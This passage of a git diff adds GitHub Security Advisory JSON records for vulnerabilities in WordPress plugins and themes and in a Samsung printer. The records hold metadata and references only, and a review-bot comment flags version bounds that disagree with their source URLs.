+ "url": "https://patchstack.com/database/Wordpress/Plugin/woo-thank-you-page-nextmove-lite/vulnerability/wordpress-nextmove-lite-plugin-2-22-0-broken-access-control-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-4mjj-m5cc-rchc/GHSA-4mjj-m5cc-rchc.json b/advisories/unreviewed/2026/02/GHSA-4mjj-m5cc-rchc/GHSA-4mjj-m5cc-rchc.json
index 537cacd209396..6fabb990bd395 100644
--- a/advisories/unreviewed/2026/02/GHSA-4mjj-m5cc-rchc/GHSA-4mjj-m5cc-rchc.json
+++ b/advisories/unreviewed/2026/02/GHSA-4mjj-m5cc-rchc/GHSA-4mjj-m5cc-rchc.json
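Review bot: The upper version bound in GHSA-4gvf-3g6g-c2mg is inconsistent within the record: `details` says `through <= 2.23.0`, but the Patchstack reference slug names `nextmove-lite-plugin-2-22-0`. The same kind of mismatch appears in GHSA-4pmf-68jr-9pq2, where `details` gives `<= 2.0.9.9.4` and the URL slug says `master-addons-plugin-2-0-6-6`. Since `"affected": []` carries no machine-readable range in either record, the prose bound is the only version signal a consumer has. I would confirm it against the vendor advisory before anyone derives a "patched at" check or an inventory query from these two entries.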
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-4mjj-m5cc-rchc",
- "modified": "2026-02-19T18:31:53Z",
+ "modified": "2026-02-20T18:31:28Z",
 "published": "2026-02-19T18:31:53Z",
 "aliases": [
 "CVE-2026-27058"
 ],
 "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PenciDesign Penci Podcast penci-podcast allows DOM-Based XSS.This issue affects Penci Podcast: from n/a through <= 1.7.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-79"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-19T09:16:27Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-4pmf-68jr-9pq2/GHSA-4pmf-68jr-9pq2.json b/advisories/unreviewed/2026/02/GHSA-4pmf-68jr-9pq2/GHSA-4pmf-68jr-9pq2.json
new file mode 100644
index 0000000000000..439b0b60c7840
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-4pmf-68jr-9pq2/GHSA-4pmf-68jr-9pq2.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4pmf-68jr-9pq2",
+ "modified": "2026-02-20T18:31:33Z",
+ "published": "2026-02-20T18:31:33Z",
+ "aliases": [
+ "CVE-2024-52387"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Liton Arefin Master Addons for Elementor master-addons allows Stored XSS.This issue affects Master Addons for Elementor: from n/a through <= 2.0.9.9.4.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-52387"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/master-addons/vulnerability/wordpress-master-addons-plugin-2-0-6-6-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-4pmr-jmj5-4gwv/GHSA-4pmr-jmj5-4gwv.json b/advisories/unreviewed/2026/02/GHSA-4pmr-jmj5-4gwv/GHSA-4pmr-jmj5-4gwv.json
new file mode 100644
index 0000000000000..485a654633815
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-4pmr-jmj5-4gwv/GHSA-4pmr-jmj5-4gwv.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4pmr-jmj5-4gwv",
+ "modified": "2026-02-20T18:31:34Z",
+ "published": "2026-02-20T18:31:34Z",
+ "aliases": [
+ "CVE-2025-68495"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Crocoblock JetEngine jet-engine allows Reflected XSS.This issue affects JetEngine: from n/a through <= 3.8.0.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68495"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/jet-engine/vulnerability/wordpress-jetengine-plugin-3-8-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-4qvw-ghv2-2gg4/GHSA-4qvw-ghv2-2gg4.json b/advisories/unreviewed/2026/02/GHSA-4qvw-ghv2-2gg4/GHSA-4qvw-ghv2-2gg4.json
new file mode 100644
index 0000000000000..bc7a27c9cd671
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-4qvw-ghv2-2gg4/GHSA-4qvw-ghv2-2gg4.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4qvw-ghv2-2gg4",
+ "modified": "2026-02-20T18:31:35Z",
+ "published": "2026-02-20T18:31:35Z",
+ "aliases": [
+ "CVE-2025-68545"
+ ],
+ "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Nika nika allows PHP Local File Inclusion.This issue affects Nika: from n/a through <= 1.2.14.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68545"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/nika/vulnerability/wordpress-nika-theme-1-2-14-local-file-inclusion-vulnerability-2?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-98"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-4r8w-crc8-mqph/GHSA-4r8w-crc8-mqph.json b/advisories/unreviewed/2026/02/GHSA-4r8w-crc8-mqph/GHSA-4r8w-crc8-mqph.json
new file mode 100644
index 0000000000000..707917cb8fe23
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-4r8w-crc8-mqph/GHSA-4r8w-crc8-mqph.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4r8w-crc8-mqph",
+ "modified": "2026-02-20T18:31:35Z",
+ "published": "2026-02-20T18:31:35Z",
+ "aliases": [
+ "CVE-2025-69301"
+ ],
+ "details": "Deserialization of Untrusted Data vulnerability in ThemeGoods PhotoMe photome allows Object Injection.This issue affects PhotoMe: from n/a through <= 5.6.11.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69301"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/photome/vulnerability/wordpress-photome-theme-5-6-11-php-object-injection-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-502"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:17Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-4wc7-crf4-r645/GHSA-4wc7-crf4-r645.json b/advisories/unreviewed/2026/02/GHSA-4wc7-crf4-r645/GHSA-4wc7-crf4-r645.json
new file mode 100644
index 0000000000000..abdce89485ab0
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-4wc7-crf4-r645/GHSA-4wc7-crf4-r645.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4wc7-crf4-r645",
+ "modified": "2026-02-20T18:31:36Z",
+ "published": "2026-02-20T18:31:36Z",
+ "aliases": [
+ "CVE-2025-69328"
+ ],
+ "details": "Deserialization of Untrusted Data vulnerability in magepeopleteam Booking and Rental Manager booking-and-rental-manager-for-woocommerce allows Object Injection.This issue affects Booking and Rental Manager: from n/a through <= 2.5.9.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69328"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/booking-and-rental-manager-for-woocommerce/vulnerability/wordpress-booking-and-rental-manager-plugin-2-5-9-php-object-injection-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-502"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:20Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-5284-5qqc-v2w8/GHSA-5284-5qqc-v2w8.json b/advisories/unreviewed/2026/02/GHSA-5284-5qqc-v2w8/GHSA-5284-5qqc-v2w8.json
new file mode 100644
index 0000000000000..ceee3bff547c1
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-5284-5qqc-v2w8/GHSA-5284-5qqc-v2w8.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5284-5qqc-v2w8",
+ "modified": "2026-02-20T18:31:34Z",
+ "published": "2026-02-20T18:31:34Z",
+ "aliases": [
+ "CVE-2025-68037"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Atlas Gondal Export Media URLs export-media-urls allows Reflected XSS.This issue affects Export Media URLs: from n/a through <= 2.2.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68037"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/export-media-urls/vulnerability/wordpress-export-media-urls-plugin-2-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-536p-mw62-6cm4/GHSA-536p-mw62-6cm4.json b/advisories/unreviewed/2026/02/GHSA-536p-mw62-6cm4/GHSA-536p-mw62-6cm4.json
new file mode 100644
index 0000000000000..37515de12bec0
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-536p-mw62-6cm4/GHSA-536p-mw62-6cm4.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-536p-mw62-6cm4",
+ "modified": "2026-02-20T18:31:36Z",
+ "published": "2026-02-20T18:31:36Z",
+ "aliases": [
+ "CVE-2025-69307"
+ ],
+ "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TeconceTheme Medinik Core medinik-core allows Blind SQL Injection.This issue affects Medinik Core: from n/a through <= 1.3.6.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69307"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/medinik-core/vulnerability/wordpress-medinik-core-plugin-1-3-6-sql-injection-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-89"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:18Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-53q4-966f-vpp2/GHSA-53q4-966f-vpp2.json b/advisories/unreviewed/2026/02/GHSA-53q4-966f-vpp2/GHSA-53q4-966f-vpp2.json
new file mode 100644
index 0000000000000..9449ecb0ba5fa
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-53q4-966f-vpp2/GHSA-53q4-966f-vpp2.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-53q4-966f-vpp2",
+ "modified": "2026-02-20T18:31:40Z",
+ "published": "2026-02-20T18:31:40Z",
+ "aliases": [
+ "CVE-2026-2832"
+ ],
+ "details": "Certain Samsung MultiXpress Multifunction Printers may be vulnerable to information disclosure, potentially exposing address book entries and other device configuration information through specific APIs without proper authorization.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2832"
+ },
+ {
+ "type": "WEB",
+ "url": "https://support.hp.com/us-en/document/ish_14108019-14108039-16/hpsbpi04094"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-200"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T18:25:53Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-56wx-rr26-54fr/GHSA-56wx-rr26-54fr.json b/advisories/unreviewed/2026/02/GHSA-56wx-rr26-54fr/GHSA-56wx-rr26-54fr.json
new file mode 100644
index 0000000000000..53904ef43ca0c
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-56wx-rr26-54fr/GHSA-56wx-rr26-54fr.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-56wx-rr26-54fr",
+ "modified": "2026-02-20T18:31:35Z",
+ "published": "2026-02-20T18:31:35Z",
+ "aliases": [
+ "CVE-2025-69011"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPKube Cool Tag Cloud cool-tag-cloud allows Stored XSS.This issue affects Cool Tag Cloud: from n/a through <= 2.29.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69011"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/cool-tag-cloud/vulnerability/wordpress-cool-tag-cloud-plugin-2-29-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:15Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-57gh-h62q-5fwp/GHSA-57gh-h62q-5fwp.json b/advisories/unreviewed/2026/02/GHSA-57gh-h62q-5fwp/GHSA-57gh-h62q-5fwp.json
new file mode 100644
index 0000000000000..19dbff5545e63
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-57gh-h62q-5fwp/GHSA-57gh-h62q-5fwp.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-57gh-h62q-5fwp",
+ "modified": "2026-02-20T18:31:35Z",
+ "published": "2026-02-20T18:31:35Z",
+ "aliases": [
+ "CVE-2025-68834"
+ ],
+ "details": "Missing Authorization vulnerability in Saiful Islam Sync Master Sheet – Product Sync with Google Sheet for WooCommerce product-sync-master-sheet allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Sync Master Sheet – Product Sync with Google Sheet for WooCommerce: from n/a through <= 1.1.3.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68834"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/product-sync-master-sheet/vulnerability/wordpress-sync-master-sheet-product-sync-with-google-sheet-for-woocommerce-plugin-1-1-3-broken-access-control-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:12Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-57vf-72qj-2828/GHSA-57vf-72qj-2828.json b/advisories/unreviewed/2026/02/GHSA-57vf-72qj-2828/GHSA-57vf-72qj-2828.json
new file mode 100644
index 0000000000000..cb83f3759f068
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-57vf-72qj-2828/GHSA-57vf-72qj-2828.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-57vf-72qj-2828",
+ "modified": "2026-02-20T18:31:36Z",
+ "published": "2026-02-20T18:31:36Z",
+ "aliases": [
+ "CVE-2025-69330"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jthemes Prestige prestige allows Reflected XSS.This issue affects Prestige: from n/a through < 1.4.1.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69330"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/prestige/vulnerability/wordpress-prestige-theme-1-4-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:20Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-58h5-w6gx-q297/GHSA-58h5-w6gx-q297.json b/advisories/unreviewed/2026/02/GHSA-58h5-w6gx-q297/GHSA-58h5-w6gx-q297.json
new file mode 100644
index 0000000000000..4fa1191a27ef1
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-58h5-w6gx-q297/GHSA-58h5-w6gx-q297.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-58h5-w6gx-q297",
+ "modified": "2026-02-20T18:31:34Z",
+ "published": "2026-02-20T18:31:34Z",
+ "aliases": [
+ "CVE-2025-67980"
+ ],
+ "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Hara hara allows PHP Local File Inclusion.This issue affects Hara: from n/a through <= 1.2.17.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67980"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/hara/vulnerability/wordpress-hara-theme-1-2-17-local-file-inclusion-vulnerability-2?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-98"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:04Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-58p5-8f5p-8qqg/GHSA-58p5-8f5p-8qqg.json b/advisories/unreviewed/2026/02/GHSA-58p5-8f5p-8qqg/GHSA-58p5-8f5p-8qqg.json
new file mode 100644
index 0000000000000..d823959e42d7a
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-58p5-8f5p-8qqg/GHSA-58p5-8f5p-8qqg.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-58p5-8f5p-8qqg",
+ "modified": "2026-02-20T18:31:34Z",
+ "published": "2026-02-20T18:31:34Z",
+ "aliases": [
+ "CVE-2025-68002"
+ ],
+ "details": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in 100plugins Open User Map open-user-map allows Path Traversal.This issue affects Open User Map: from n/a through <= 1.4.16.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68002"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/open-user-map/vulnerability/wordpress-open-user-map-plugin-1-4-16-arbitrary-file-download-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-22"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:06Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-58qh-jxh9-rvp5/GHSA-58qh-jxh9-rvp5.json b/advisories/unreviewed/2026/02/GHSA-58qh-jxh9-rvp5/GHSA-58qh-jxh9-rvp5.json
new file mode 100644
index 0000000000000..b426dd1ef3574
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-58qh-jxh9-rvp5/GHSA-58qh-jxh9-rvp5.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-58qh-jxh9-rvp5",
+ "modified": "2026-02-20T18:31:34Z",
+ "published": "2026-02-20T18:31:34Z",
+ "aliases": [
+ "CVE-2025-67969"
+ ],
+ "details": "Missing Authorization vulnerability in knitpay UPI QR Code Payment Gateway for WooCommerce upi-qr-code-payment-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects UPI QR Code Payment Gateway for WooCommerce: from n/a through <= 1.5.1.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67969"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/upi-qr-code-payment-for-woocommerce/vulnerability/wordpress-upi-qr-code-payment-gateway-for-woocommerce-plugin-1-5-1-broken-access-control-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:03Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-5h9r-fr4c-2vwr/GHSA-5h9r-fr4c-2vwr.json b/advisories/unreviewed/2026/02/GHSA-5h9r-fr4c-2vwr/GHSA-5h9r-fr4c-2vwr.json
new file mode 100644
index 0000000000000..b638bab3f2623
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-5h9r-fr4c-2vwr/GHSA-5h9r-fr4c-2vwr.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5h9r-fr4c-2vwr",
+ "modified": "2026-02-20T18:31:34Z",
+ "published": "2026-02-20T18:31:34Z",
+ "aliases": [
+ "CVE-2025-67993"
+ ],
+ "details": "Missing Authorization vulnerability in Vito Peleg Atarim atarim-visual-collaboration allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Atarim: from n/a through <= 4.2.1.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67993"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/atarim-visual-collaboration/vulnerability/wordpress-atarim-plugin-4-2-1-broken-access-control-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:05Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-5j3p-mg5x-539j/GHSA-5j3p-mg5x-539j.json b/advisories/unreviewed/2026/02/GHSA-5j3p-mg5x-539j/GHSA-5j3p-mg5x-539j.json
new file mode 100644
index 0000000000000..0913f69239cb2
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-5j3p-mg5x-539j/GHSA-5j3p-mg5x-539j.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5j3p-mg5x-539j",
+ "modified": "2026-02-20T18:31:35Z",
+ "published": "2026-02-20T18:31:35Z",
+ "aliases": [
+ "CVE-2025-68847"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in itex iSape isape allows Reflected XSS.This issue affects iSape: from n/a through <= 0.72.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68847"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/isape/vulnerability/wordpress-isape-plugin-0-72-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:13Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-5ppr-f7g3-89cw/GHSA-5ppr-f7g3-89cw.json b/advisories/unreviewed/2026/02/GHSA-5ppr-f7g3-89cw/GHSA-5ppr-f7g3-89cw.json
new file mode 100644
index 0000000000000..e8c89a7f6ed5a
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-5ppr-f7g3-89cw/GHSA-5ppr-f7g3-89cw.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5ppr-f7g3-89cw",
+ "modified": "2026-02-20T18:31:38Z",
+ "published": "2026-02-20T18:31:38Z",
+ "aliases": [
+ "CVE-2026-22345"
+ ],
+ "details": "Deserialization of Untrusted Data vulnerability in A WP Life Image Gallery – Lightbox Gallery, Responsive Photo Gallery, Masonry Gallery new-image-gallery allows Object Injection.This issue affects Image Gallery – Lightbox Gallery, Responsive Photo Gallery, Masonry Gallery: from n/a through <= 1.6.0.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22345"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/new-image-gallery/vulnerability/wordpress-image-gallery-lightbox-gallery-responsive-photo-gallery-masonry-gallery-plugin-1-6-0-php-object-injection-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-502"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:33Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-5w67-c6pv-hmpq/GHSA-5w67-c6pv-hmpq.json b/advisories/unreviewed/2026/02/GHSA-5w67-c6pv-hmpq/GHSA-5w67-c6pv-hmpq.json
new file mode 100644
index 0000000000000..ae531b18039a8
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-5w67-c6pv-hmpq/GHSA-5w67-c6pv-hmpq.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5w67-c6pv-hmpq",
+ "modified": "2026-02-20T18:31:35Z",
+ "published": "2026-02-20T18:31:35Z",
+ "aliases": [
+ "CVE-2025-69294"
+ ],
+ "details": "Deserialization of Untrusted Data vulnerability in fuelthemes PeakShops peakshops allows Object Injection.This issue affects PeakShops: from n/a through <= 1.5.9.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69294"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/peakshops/vulnerability/wordpress-peakshops-theme-1-5-9-php-object-injection-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-502"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:15Z"
+ }
+}
\ No newline at end of file
